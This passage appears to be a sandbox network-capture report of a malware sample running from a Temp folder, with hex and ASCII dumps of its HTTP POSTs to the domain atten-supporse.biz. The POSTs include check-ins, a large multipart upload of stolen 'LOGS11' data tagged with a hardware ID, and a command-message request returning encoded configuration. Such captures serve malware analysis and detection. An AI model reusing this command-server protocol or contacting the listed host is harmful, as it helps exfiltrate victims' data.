                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1710&rtt_var=672&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2151&delivery_rate=1593016&cwnd=151&unsent_bytes=0&cid=2288d645a5320b8d&ts=740&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                                              2024-12-09 22:09:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              6192.168.2.449827104.21.48.14433512C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:29 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-09 22:09:30 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:30 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=mbith5mof6at9kn5csh85oiis9; expires=Fri, 04-Apr-2025 15:56:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=av2L1ckgFVG5ztxUnfnWcJvyy362K5GysMfi9pHWOschTjO2cvI2%2BwOP9MwNxY0qou985BnGxVUJBCl0zFkgLHspK%2BnaxAcfBMh8g6TJFQmLQ8S7tp8cxqry4G6Kabwys7As4qg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef851e19a7cf797-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1711&rtt_var=644&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1706604&cwnd=151&unsent_bytes=0&cid=9c9d7e6e2d451e37&ts=853&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:30 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-09 22:09:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              7192.168.2.449833104.21.48.14437872C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=ZMLGRCBVM6
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 578714
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC15331OUTData Raw: 2d 2d 5a 4d 4c 47 52 43 42 56 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 5a 4d 4c 47 52 43 42 56 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 4d 4c 47 52 43 42 56 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 5a 4d 4c 47 52 43 42 56 4d 36 0d 0a 43 6f
                                                                                                                                                                                                                                                              Data Ascii: --ZMLGRCBVM6Content-Disposition: form-data; name="hwid"3A3450F0EC9224B723D904AF30EFEBBC--ZMLGRCBVM6Content-Disposition: form-data; name="pid"1--ZMLGRCBVM6Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--ZMLGRCBVM6Co
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC15331OUTData Raw: dd 5b 39 1a b6 6a d1 a4 4c 27 0f 0f 95 1b 3f c0 21 91 61 d3 86 9e d5 c2 ef 28 3a 26 2c 15 b2 c4 53 14 a3 10 57 87 3a 72 f3 83 2d f7 3c 06 f6 81 6e ac 31 fb be 2c 68 59 b9 d6 a6 62 09 e7 c1 07 e3 91 40 c7 9f ef 03 fe 50 a6 28 c6 1a a0 db 2a c1 e2 db 88 98 00 75 2e a5 1c 6d b9 d8 a2 8f 07 50 97 f5 4c 9d 38 29 75 f7 dd cb 38 d5 5c ac b2 a0 80 0e ca 43 91 89 09 4e 11 f9 d0 5a 94 69 65 4a 37 06 1f c6 0a 75 09 a7 3d a4 12 df ac 8a cf 98 ca 55 ff 52 aa c0 06 20 aa b6 b8 bc d0 3c e8 2d 31 a5 49 3f 46 77 e2 18 9e 62 82 0e 5b f2 3b 75 7c ff ae 20 2e f4 15 6a 6c 7f 99 03 13 39 72 db 76 09 ff 74 a0 61 19 a1 27 6c 94 7f bc fb b8 4b 34 c6 6d 6d 5f 3f 77 e6 b0 ef 04 12 83 5a 64 c6 46 a7 72 a4 1f 8b e4 ce 25 ef 33 56 d2 e1 7f d6 a1 19 4d 1e ec b4 dc ef b6 e5 59 34 8d 9a
                                                                                                                                                                                                                                                              Data Ascii: [9jL'?!a(:&,SW:r-<n1,hYb@P(*u.mPL8)u8\CNZieJ7u=UR <-1I?Fwb[;u| .jl9rvta'lK4mm_?wZdFr%3VMY4
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC15331OUTData Raw: 3a 6f 45 aa d4 77 eb ab 06 bc 6b 3a ea b8 75 ca a1 ca 59 74 4a 79 f4 3b f8 b9 d3 f3 af d9 5e 6e cd af 71 43 f7 7d 93 71 cc d6 8c d9 6c 16 2f 63 99 71 64 ad da 9d 7a ed 8f 8f af 45 6f 09 52 66 ab b3 ba 5f 07 55 9b 2b 02 7f e7 5b a8 96 9f 13 e5 37 50 c4 fb 57 5f 43 b4 58 ff c3 10 da 1d b0 f3 0a 85 e5 37 37 ae cc 47 cd 05 ec 78 50 d3 fb ea c6 75 27 76 e6 6b 82 55 c4 4b 07 e9 c2 97 cc d6 ab 45 90 f2 3d 87 55 bb 33 d1 90 88 90 dc cf 2e 7a 6c e4 b9 e5 19 1d 54 fc 61 2c 06 02 7d a7 d4 8a b4 04 49 22 14 0f 9c 0c f1 a2 14 fd 00 5c e4 08 64 a2 e1 84 e5 70 eb 92 58 ca 99 5f 18 bc 4c 92 e6 0b 4e 8c 5b 74 a8 55 78 81 cf 80 e5 8a e3 bd 91 f4 e7 e7 3b c2 9c c4 72 bb 05 09 1e 92 ab 67 21 ee 91 6a af 13 97 4c e9 de 8a 96 63 b3 64 de 45 bf bd 58 d8 ea db d9 d9 76 ab b8 c5
                                                                                                                                                                                                                                                              Data Ascii: :oEwk:uYtJy;^nqC}ql/cqdzEoRf_U+[7PW_CX77GxPu'vkUKE=U3.zlTa,}I"\dpX_LN[tUx;rg!jLcdEXv
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC15331OUTData Raw: 73 5a c5 93 a2 79 17 c8 e5 31 99 99 a7 2b c6 89 f5 d2 85 22 5e 02 36 17 f3 1d 9f bb 05 9e 0a 06 d1 be 91 61 f1 6a a8 0b 50 02 c6 9e d3 b8 fb 2f b0 a6 aa 7b f6 53 dd 5d ab 1c 8e 04 07 77 e1 06 0b 44 b3 54 56 a6 14 63 56 b9 2e 2a 96 10 d8 fc 67 e4 e6 d9 d9 e3 8d c9 f1 1f f6 f5 1c f0 5a e1 fe ce 6c 1d 4e 60 ff 60 31 b9 3b ff 24 5b f6 f9 36 8b c4 5d fa d3 77 e3 19 4e 26 b5 8f b6 d2 d5 fc 3b 0d 1a 53 bc b3 93 31 4e fd d3 0c 1e 8f 22 f4 ca 4b ec 3c ef 3f f3 33 4e fb 8c b9 5e 03 e5 b5 bb c5 5e cb 72 50 f4 de 89 88 6c 50 c3 c7 5b 7d 1f 65 ce b3 eb 1b ce 21 ef fd 20 2b f0 ef 03 43 21 52 bf 10 31 0d 7d ef 77 eb c8 35 c7 0a 1c dc e5 7c 56 93 2f 96 30 df 52 7c 73 7a fa ce c4 c3 55 35 89 9a d2 d4 14 ab 1f cd 56 dc 93 02 28 08 ba e0 c1 df 1e c5 39 b0 77 5f 97 51 5a ff
                                                                                                                                                                                                                                                              Data Ascii: sZy1+"^6ajP/{S]wDTVcV.*gZlN``1;$[6]wN&;S1N"K<?3N^^rPlP[}e! +C!R1}w5|V/0R|szU5V(9w_QZ
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC15331OUTData Raw: 3e a1 f6 b9 a9 f2 8e c4 9e 96 7c cb 8a 96 e3 64 61 a0 7e b0 cd 6f 7f 4a b0 10 ea fc 84 b1 4d 1a 83 dd 7a 80 60 58 17 e2 2d 6e e2 77 0d 0f a2 44 e9 a1 61 f4 79 00 47 32 aa 92 af 5d 06 c6 c7 a0 f4 fb 9a 84 38 fa ca b9 4b d7 b7 88 d2 49 85 b8 c9 20 fa ff a9 90 ff ff 43 b2 2d 48 3a 2c e6 b1 15 30 ef c4 83 0f 68 6b 55 e4 7b 9d b1 0b 23 98 3d 60 1b a7 55 47 93 d9 df d9 65 e5 8b 01 92 32 77 01 91 ac 7c c9 d1 25 76 c3 7c c4 08 1d c1 a3 65 b9 7f 75 57 1e a4 2c 1f 39 e0 34 b7 94 2d f1 e7 7a 0d 22 b9 24 99 4f 20 7a 0b 87 1c 2b dd 23 c0 ec be e7 6a 2f 88 ef 83 31 01 dd bd c2 64 e9 b0 20 b9 b5 82 7d c6 e5 b8 40 08 78 5b 12 59 45 2b fd 5b ce ed f4 a4 1c f1 3b dd b5 83 52 1b 1e 03 88 a1 69 0c ee c6 3d 6e 54 b7 c5 02 40 48 bf d5 7e cf 35 05 8f 2a d8 9e 74 ca 77 e3 9c 9d
                                                                                                                                                                                                                                                              Data Ascii: >|da~oJMz`X-nwDayG2]8KI C-H:,0hkU{#=`UGe2w|%v|euW,94-z"$O z+#j/1d }@x[YE+[;Ri=nT@H~5*tw
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC15331OUTData Raw: 61 38 56 fd c7 71 0d 6d 96 e9 88 dc 5e fa 1f 17 9b ea 9e 8d 12 f8 d1 c6 e6 4c b9 b1 ea 64 5c b4 27 3f 70 6d b6 90 a1 0d 64 23 c6 9a fc 44 0b 6b 05 0c 88 59 ea 10 04 f1 ae 08 2f 2b 4d 8e 05 51 fa d5 66 07 c3 8c 8f b4 36 af 9b 83 26 4b b5 94 d0 24 34 be 74 99 60 a0 8f 5e f5 3b ef 9b fa 72 46 57 8a 55 b4 60 ff 2b 71 65 cb a0 00 f2 f8 00 b7 19 05 7b a7 ba a2 8b 8f e8 7b af dd be 6d 82 07 ef 0b ff 3d 5d 63 b7 73 f4 40 19 e0 05 bc 98 95 be 40 89 fe df de 59 ba 49 a4 84 40 c3 15 ee aa 6e f1 2f f4 4c f2 5a f7 38 5b 81 2a 9c ef a8 2f 07 52 53 66 1c 15 2a 4f 72 a4 c2 60 24 6b 9b 97 18 4b 33 c7 37 69 06 a5 ff 88 4f 70 68 33 30 a8 ad 6c 4b 26 d7 6a b5 e0 23 5c 66 bb 9f 06 59 e2 27 27 38 12 8e 69 e8 f0 63 2b f1 13 2e 08 8a 43 99 9f e7 03 d1 cf 68 1b fc f3 64 0a 3d 9c
                                                                                                                                                                                                                                                              Data Ascii: a8Vqm^Ld\'?pmd#DkY/+MQf6&K$4t`^;rFWU`+qe{{m=]cs@@YI@n/LZ8[*/RSf*Or`$kK37iOph30lK&j#\fY''8ic+.Chd=
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC15331OUTData Raw: 79 d0 73 01 07 f1 61 5a b1 60 26 80 b8 5b 14 20 d5 a5 1e 16 41 59 03 a7 8c 9a 00 d5 e3 fc f9 59 ab 0a c2 d0 3c 86 f3 fb 4c e4 d1 99 f8 bb 94 68 4a 5b 70 d5 83 d9 fb 7b 6b d2 77 13 63 b9 d6 cc d4 da ba 84 15 53 48 de 81 5e 3c 98 98 4b 8e c5 64 1b 26 b0 84 45 fb 58 77 5f a6 35 b3 7e f6 86 3c e2 51 1f cf 46 ca 01 62 9a d2 e5 20 d2 c2 48 53 4f 9e f7 ba 87 60 9a 11 92 89 f8 ab 25 95 2d e3 67 72 0a e2 bb 1f 61 9d 05 2c 33 e8 f2 8a e2 f7 08 7d e2 47 ff 24 f7 6c 9c 05 59 f3 64 e1 30 27 a5 68 2c 8c f1 4f 62 25 9e 42 b7 a1 f4 6d d8 8f 4f ed 71 57 c6 86 58 b3 d3 05 c9 16 eb a1 0a 57 43 23 60 14 ce d5 3f 1a 1d 16 45 4e ba bd bc 1f bc fe d9 aa af 1b 1a 34 cd 57 7f 62 ac 76 20 03 8e 67 98 3a 54 26 0b 65 09 d9 61 c3 06 32 49 88 38 22 7e 33 d8 39 9f 60 84 af c3 9f a6 f3
                                                                                                                                                                                                                                                              Data Ascii: ysaZ`&[ AYY<LhJ[p{kwcSH^<Kd&EXw_5~<QFb HSO`%-gra,3}G$lYd0'h,Ob%BmOqWXWC#`?EN4Wbv g:T&ea2I8"~39`
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC15331OUTData Raw: f2 d1 20 fb 25 e9 cc ca a7 7e 46 c4 d1 fe 50 09 e0 80 97 ca 70 7b b3 de 25 16 6e 47 c1 af 35 68 05 b0 5f 52 5c fa 7a 60 3e 31 ed 52 bc 95 a7 9a 2c bf e5 37 81 a2 66 86 98 c6 f1 1a 32 a5 c6 5e 69 e7 71 60 81 f7 94 8d 18 09 61 30 17 dd ff c2 39 06 8f a8 32 f2 93 40 62 4b 30 b8 d1 1e fa fe 60 d4 f7 35 f5 a1 b7 20 31 cd 54 2a 7b 86 d1 51 77 26 78 2d eb 24 d3 6e 4b ed 22 e1 a3 39 94 9e 2a 9b 4d 22 e4 27 30 f2 72 0c bb 8f dc 76 e4 9f db c6 f9 51 4c ad 3c 43 c9 2e e4 e3 87 fe 9c c9 45 49 f6 46 0e b7 0a 82 c4 6d 13 6f f5 76 e3 1a cd f1 52 ce 74 14 86 1d c9 27 67 21 67 e0 ef 2c e6 a6 60 36 df e0 55 4b 2e c3 f2 83 bb 6c d9 f9 84 59 32 d9 55 03 30 be 0c 06 3e 3a 02 57 0a 6a e8 f0 42 72 58 70 c7 89 93 ae 77 a6 74 ae b9 62 ef 7f 61 2a a8 fa 11 7b 1b f3 62 ae 5f 21 18
                                                                                                                                                                                                                                                              Data Ascii: %~FPp{%nG5h_R\z`>1R,7f2^iq`a092@bK0`5 1T*{Qw&x-$nK"9*M"'0rvQL<C.EIFmovRt'g!g,`6UK.lY2U0>:WjBrXpwtba*{b_!
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC15331OUTData Raw: af 71 4f 62 e0 62 e1 ee 86 e0 61 aa e9 79 ad 1c 2f 34 2d 4e 78 ae 03 86 7b 97 8f 25 29 8e 83 73 c2 5d 91 ec c1 91 96 61 4c 4e c8 e4 3d 3c cf 7f 55 31 4f 74 a9 63 1d 2e 53 af ad 01 3f c5 ba 45 5b db 7e 67 25 26 58 92 11 23 64 7e c1 1e 1b db 09 65 ef d8 a6 87 4e 7c ef 5a 04 15 8a 22 01 49 3b 2c 0f 35 87 ff 25 c5 7f b1 3c 4f 22 92 b8 7a e9 47 de 6c a1 4f d5 aa c1 28 68 6f 39 f3 d2 03 14 ff d3 0c 38 bd 56 a1 a2 b1 5d 9f ef e5 b6 04 ab 92 c3 d6 eb 73 16 a3 5f c6 7f 27 44 90 67 85 d3 5b 0f ad d5 a6 9a 47 1f 71 f5 61 9d f8 32 b8 35 b6 bb 88 30 57 49 eb 28 01 8c ed 66 2a a5 e4 ad 30 f3 bc fe da f5 e2 6e da 4c 70 ea bf 11 95 05 2b ff f2 c1 33 30 35 cb 4b 53 1a 3c 2a 46 a1 69 f1 5b a5 e4 0a 77 12 c1 75 34 57 af e3 97 f9 ad 26 e8 a7 e7 17 b3 1c 87 cf 51 8e 10 43 e7
                                                                                                                                                                                                                                                              Data Ascii: qObbay/4-Nx{%)s]aLN=<U1Otc.S?E[~g%&X#d~eN|Z"I;,5%<O"zGlO(ho98V]s_'Dg[Gqa250WI(f*0nLp+305KS<*Fi[wu4W&QC
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC15331OUTData Raw: 24 b2 e9 91 59 f2 eb 00 0e a3 1e aa 8c a3 4b 66 ee 5f 8b cf b9 de 73 2b e7 fa 5f 76 e5 cc 87 39 d7 b8 4d 27 ae 18 52 c8 26 35 61 38 bc 32 38 5e 63 74 72 a5 b6 4b 79 f9 6e 03 1e e8 db a8 f9 a6 5c 06 dd 02 dc 78 2c d0 be 74 07 a2 96 23 d9 19 0b 9a 28 ae 2a c0 a2 fb cf b4 5e d2 bd 3d e9 5d 47 d5 86 5d f9 97 df ee 62 50 05 40 67 d5 b2 ff 96 8d d7 80 fb 85 a9 68 fc ac b2 d8 5a 63 25 2e 9a 6e 5b 99 2a b7 16 09 d0 19 dc 7f d2 76 7f 8a a8 74 b4 ee fc 33 1a 88 de 29 9f 9c 36 de 4c a9 35 a0 18 e9 b1 39 fb c5 82 97 63 6e b9 e6 5c fa 95 d4 e2 79 5e 6a 3e ef 5a 0a 3a 20 b6 25 6c 55 54 1d 66 ec 75 0a 81 50 3f ed 22 83 af ae dd 7f 71 f1 36 1e 8d 33 62 67 93 51 98 73 3e f3 7e d5 0b b5 5a b3 c3 f8 b5 18 65 90 ee 4a 9e 15 25 b0 c0 32 1e cd 0f 90 8f 80 bd 3b 67 24 36 60 9a
                                                                                                                                                                                                                                                              Data Ascii: $YKf_s+_v9M'R&5a828^ctrKyn\x,t#(*^=]G]bP@ghZc%.n[*vt3)6L59cn\y^j>Z: %lUTfuP?"q63bgQs>~ZeJ%2;g$6`
                                                                                                                                                                                                                                                              2024-12-09 22:09:37 UTC1029INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:36 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=fbbr7jr8i4m4nb3r3m64og3fm6; expires=Fri, 04-Apr-2025 15:56:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLZEVkqNbMsgxDyTpgW8LwWKiNmRE%2FLq%2Bf%2BkjSA9mylLFpXhY7MBe6XK5NeJ1w%2BNwAcLGPdGC4XMi0rMQSNxUgNfW%2FkqjX0PkZxdtIDGNZNfxBWYl8M%2FAIWHdCY0dxiWfFOi2C8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef851eebe000cc8-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1532&rtt_var=740&sent=297&recv=601&lost=0&retrans=0&sent_bytes=2847&recv_bytes=581277&delivery_rate=1330296&cwnd=225&unsent_bytes=0&cid=0b00891076bebeae&ts=5236&x=0"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              8192.168.2.449834104.21.48.14433512C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 53
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:31 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                                              2024-12-09 22:09:32 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ohm7kita4si160782jmekh0v4g; expires=Fri, 04-Apr-2025 15:56:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s3DrIfK9cbEwDoaFPolb7GAC6Pj3DKBpZssaXR2UMMHgvhz9Eb8su8RGnJkiWVcnluu9WkGj%2B0CehrC9xVs8P2F3iirIzx0JQLviY8Fde1cnyBIPzxWJza%2FRsPafw3BTeq4U%2F1g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef851efeff1f797-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1728&rtt_var=662&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1689814&cwnd=151&unsent_bytes=0&cid=9f6f5fc86961f3b9&ts=603&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:32 UTC354INData Raw: 33 65 36 62 0d 0a 35 67 37 75 79 32 52 57 4d 68 59 49 47 58 64 79 2f 49 33 59 67 6d 66 78 78 78 74 76 5a 37 73 68 71 57 69 35 79 73 65 4c 62 4e 69 64 4c 4a 6a 70 58 6d 49 65 4e 48 74 38 56 55 69 49 2f 36 33 6e 53 39 4f 6d 66 30 31 64 33 55 44 46 47 39 7a 6d 35 66 30 42 2b 74 78 6f 6a 36 63 58 4d 78 34 30 62 57 46 56 53 4b 66 32 2b 75 63 4a 30 2f 30 35 43 67 33 5a 51 4d 55 4b 32 4b 47 6f 2b 77 43 37 6a 6d 4b 4a 6f 77 45 31 56 6e 64 6b 64 42 49 58 6d 65 79 79 37 41 36 63 72 33 5a 4e 53 35 6c 45 30 30 71 44 36 49 72 75 47 4c 6d 72 62 35 32 67 52 69 73 65 62 53 70 38 47 56 44 47 72 37 6e 6e 42 5a 32 68 66 77 51 50 30 30 6e 4e 43 39 32 67 74 2b 49 4b 73 49 35 73 69 71 49 4c 50 45 4a 36 62 6e 4d 5a 45 5a 50 73 2b 71 35 46 6c 4c 30 35 56 55 57 4b 63 63 67 62 79
                                                                                                                                                                                                                                                              Data Ascii: 3e6b5g7uy2RWMhYIGXdy/I3YgmfxxxtvZ7shqWi5yseLbNidLJjpXmIeNHt8VUiI/63nS9Omf01d3UDFG9zm5f0B+txoj6cXMx40bWFVSKf2+ucJ0/05Cg3ZQMUK2KGo+wC7jmKJowE1VndkdBIXmeyy7A6cr3ZNS5lE00qD6IruGLmrb52gRisebSp8GVDGr7nnBZ2hfwQP00nNC92gt+IKsI5siqILPEJ6bnMZEZPs+q5FlL05VUWKccgby
                                                                                                                                                                                                                                                              2024-12-09 22:09:32 UTC1369INData Raw: 4f 56 42 6d 59 6e 41 65 46 59 7a 6b 73 2b 30 49 6b 36 68 7a 41 67 62 5a 52 4d 45 41 31 4b 4b 68 35 41 4f 38 68 47 7a 4d 35 30 59 7a 53 44 51 79 4f 7a 59 56 6a 75 69 32 39 6b 65 70 35 57 5a 44 48 4a 6c 45 78 30 71 44 36 4b 33 73 44 62 6d 50 59 34 2b 68 44 53 5a 51 5a 6d 78 32 45 41 4b 59 36 72 54 71 42 6f 47 76 64 77 73 47 30 45 6a 43 44 39 79 73 35 61 64 4f 76 5a 77 73 31 4f 6b 6e 4f 56 74 34 59 47 77 56 55 49 47 68 6f 36 41 43 6e 2b 55 68 54 51 48 59 52 38 6f 4f 31 61 61 68 35 51 69 30 69 57 4f 4b 6f 77 59 7a 57 6e 78 69 65 68 67 62 6b 65 2b 2f 37 51 47 56 71 58 67 49 52 5a 63 44 7a 42 4b 62 38 4f 58 48 43 62 6d 57 4c 72 6d 71 43 44 70 58 59 69 70 6b 57 77 6e 65 36 4c 61 67 58 64 4f 72 66 41 49 58 32 46 48 4f 42 4d 6d 6b 6f 4f 38 44 75 59 70 73 69 61 34
                                                                                                                                                                                                                                                              Data Ascii: OVBmYnAeFYzks+0Ik6hzAgbZRMEA1KKh5AO8hGzM50YzSDQyOzYVjui29kep5WZDHJlEx0qD6K3sDbmPY4+hDSZQZmx2EAKY6rTqBoGvdwsG0EjCD9ys5adOvZws1OknOVt4YGwVUIGho6ACn+UhTQHYR8oO1aah5Qi0iWOKowYzWnxiehgbke+/7QGVqXgIRZcDzBKb8OXHCbmWLrmqCDpXYipkWwne6LagXdOrfAIX2FHOBMmkoO8DuYpsia4
